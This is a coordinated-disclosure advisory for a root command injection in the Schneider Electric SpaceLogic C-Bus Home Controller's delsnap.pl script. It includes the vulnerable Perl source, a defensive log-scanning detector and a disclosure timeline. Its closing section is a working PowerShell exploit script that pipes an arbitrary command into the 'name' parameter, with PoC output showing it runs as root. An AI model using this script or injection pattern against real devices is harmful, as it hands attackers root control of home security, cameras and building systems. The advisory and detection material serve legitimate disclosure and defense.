CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score: 9.1 High (Confidence: High)
EPSS: 0.971 High (Percentile: 99.8%)
Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
Advisory ID: ZSL-2022-5710
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 20.07.2022
SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants.
Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems… you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide!
The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls.
The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in the 'delsnap.pl' Perl/CGI script, which is used for deleting snapshots taken from the webcam.
--------------------------------------------------------------------------------
#!/usr/bin/perl
use IO::Handle;

# Unbuffered output on both STDERR and STDOUT
select(STDERR);
$| = 1;
select(STDOUT);
$| = 1;

#print "\r\n\r\n";

$CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
use CGI;

my $PROGNAME = "delsnap.pl";

my $cgi = new CGI();

# 'name' is read straight from the request; nothing below validates it
my $name = $cgi->param('name');
if ($name eq "list") {
    print "\r\n\r\n";
    print "DATA=";
    print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
    exit(0);
}
if ($name eq "deleteall") {
    print "\r\n\r\n";
    print "DELETINGALL=TRUE&";
    print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
    print "COMPLETED=true\n";
    exit(0);
}
#print "name $name\n";
print "\r\n\r\n";
# The request value is appended to the snapshot directory as-is
my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";

unlink $filename or die "COMPLETED=false\n";

print "COMPLETED=true\n";
--------------------------------------------------------------------------------
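A detection check for the issue described above, added here as an example and not part of the original advisory or the vendor's code: it scans web access log lines for `delsnap.pl` requests whose `name` value is neither `list`, `deleteall`, nor a plain file name. The Common Log Format input, the sample log lines and the allowed file-name pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Values the script handles itself, per the listing above.
KEYWORDS = {"list", "deleteall"}
# Assumption: snapshot files have plain names (letters, digits, dot, dash, underscore).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+"')

# Constructed sample lines (not taken from a real device).
SAMPLE_LOG = [
    '192.0.2.10 - admin [30/Jun/2022:14:48:01 +0000] "GET /delsnap.pl?name=list HTTP/1.1" 200 57',
    '192.0.2.10 - admin [30/Jun/2022:14:48:09 +0000] "GET /delsnap.pl?name=snap_0001.jpg HTTP/1.1" 200 15',
    '192.0.2.10 - admin [30/Jun/2022:14:48:20 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '192.0.2.77 - admin [30/Jun/2022:14:48:43 +0000] "GET /delsnap.pl?name=%7Cid HTTP/1.1" 200 129',
]


def classify_name(value):
    """Return 'ok' for the two keywords or a plain file name, else 'suspicious'."""
    if value in KEYWORDS or SAFE_NAME.fullmatch(value):
        return "ok"
    return "suspicious"


def scan(lines):
    """Return [(line_number, decoded name)] for delsnap.pl requests with an unexpected name."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/delsnap.pl"):
            continue
        # parse_qs percent-decodes, so encoded metacharacters are seen in clear.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("name", []):
            if classify_name(value) == "suspicious":
                findings.append((number, value))
    return findings


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected name value {value!r}")
```

The same allowlist (two keywords or a plain file name) is what a reverse proxy or WAF rule in front of an unpatched controller would enforce on the `name` parameter.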
Vendor: Schneider Electric SE - <https://www.se.com>
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
formerly known as C-Bus Wiser Home Controller MK2
V1.31.460 and prior
Firmware: 604
Tested on: Machine: OMAP3 Wiser2 Board
CPU: ARMv7 revision 2
GNU/Linux 2.6.37 (armv7l)
BusyBox v1.22.1
thttpd/2.25b
Perl v5.20.0
Clipsal 81
Angstrom 2009.X-stable
PICED 4.14.0.100
lighttpd/1.7
GCC 4.4.3
NodeJS v10.15.3
[27.03.2022] Vulnerability discovered.
[31.03.2022] Reported the vulnerability to the vendor.
[31.03.2022] Vendor receives PoC, starts analysis and creates SE-6334 (Remote Root Exploit).
[11.04.2022] Asked vendor for confirmation and status update.
[11.04.2022] Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed.
[20.04.2022] Asked vendor for confirmation and scheduled patch release date.
[21.04.2022] Vendor is still analyzing.
[30.04.2022] Asked vendor for status update.
[02.05.2022] Vendor states that the product team has finalized their action plan and has provided a tentative fix release date of end of June.
[02.05.2022] Replied to the vendor.
[02.05.2022] The product team is working diligently on the fix. If there are any changes to the release date, we will let you know immediately.
[03.06.2022] Asked vendor for status update.
[03.06.2022] Vendor responds, tentative fix release date remains end of June.
[27.06.2022] Asked vendor for status update.
[28.06.2022] Vendor is finalizing the security notification and expecting to disclose on July 12th 2022.
[30.06.2022] Vendor sends encrypted draft advisory for review.
[02.07.2022] Sent our encrypted draft advisory for alignment of content.
[08.07.2022] Vendor reviews the advisory and agrees that it is aligned with the contents. Provided advisory URL and asked for release date.
[10.07.2022] Replied to the vendor with scheduled advisory release date.
[12.07.2022] Vendor released advisory SEVD-2022-193-02.
[20.07.2022] Coordinated public security advisory released.
Vulnerability discovered by Gjoko Krstic
[1] <https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>
[2] <https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf>
[3] <https://www.se.com/ww/en/work/support/cybersecurity/wall-of-thanks.jsp>
[4] <https://vulners.com/cve/CVE-2022-34753>
[5] <https://nvd.nist.gov/vuln/detail/CVE-2022-34753>
[6] <https://packetstormsecurity.com/files/167783/>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/231262>
[8] <https://www.cisa.gov/uscert/ncas/bulletins/sb22-199>
[9] <https://www.exploit-db.com/exploits/50987>
[20.07.2022] - Initial release
[22.07.2022] - Added reference [6] and [7]
[29.07.2022] - Added reference [8] and [9]
Zero Science Lab
Web: <https://www.zeroscience.mk>
<#SpaceLogic.ps1
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
Vendor: Schneider Electric SE
Product web page: https://www.se.com
https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
formerly known as C-Bus Wiser Home Controller MK2
V1.31.460 and prior
Firmware: 604
Desc: The home automation solution suffers from
an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary
shell commands as the root user via the 'name' GET
parameter in 'delsnap.pl' Perl/CGI script which is
used for deleting snapshots taken from the webcam.
=========================================================
/www/delsnap.pl:
----------------
#!/usr/bin/perl
use IO::Handle;


select(STDERR);
$| = 1;
select(STDOUT);
$| = 1;

#print "\r\n\r\n";

$CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
use CGI;

my $PROGNAME = "delsnap.pl";

my $cgi = new CGI();

my $name = $cgi->param('name');
if ($name eq "list") {
    print "\r\n\r\n";
    print "DATA=";
    print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
    exit(0);
}
if ($name eq "deleteall") {
    print "\r\n\r\n";
    print "DELETINGALL=TRUE&";
    print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
    print "COMPLETED=true\n";
    exit(0);
}
#print "name $name\n";
print "\r\n\r\n";
my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";

unlink $filename or die "COMPLETED=false\n";

print "COMPLETED=true\n";
=========================================================
Tested on: Machine: OMAP3 Wiser2 Board
CPU: ARMv7 revision 2
GNU/Linux 2.6.37 (armv7l)
BusyBox v1.22.1
thttpd/2.25b
Perl v5.20.0
Clipsal 81
Angstrom 2009.X-stable
PICED 4.14.0.100
lighttpd/1.7
GCC 4.4.3
NodeJS v10.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5710
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
CVE ID: CVE-2022-34753
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753
27.03.2022
#>
$host.UI.RawUI.ForegroundColor = "Green"
if ($($args.Count) -ne 2) {
    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
} else {
    $ip = $args[0]
    $cmd = $args[1]
    $cmdinj = "/delsnap.pl?name=|$cmd"
    Write-Host("`nSending command '$cmd' to $ip`n")
    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
    curl -v $ip$cmdinj
}
<#PoC
PS C:\> .\SpaceLogic.ps1
Usage: .\SpaceLogic.ps1 [IP] [CMD]
PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"
Sending command 'uname -a;id;pwd' to 192.168.1.2
VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
VERBOSE: received 129-byte response of content type text/html; charset=utf-8
StatusCode : 200
StatusDescription : OK
Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
uid=0(root) gid=0(root)
/custom-package
RawContent : HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Length: 129
Content-Type: text/html; charset=utf-8
Date: Thu, 30 Jun 2022 14:48:43 GMT
ETag: W/"81-LTIWJvYlDBYAlgXEy...
Forms : {}
Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;
charset=utf-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 129
PS C:\>
#>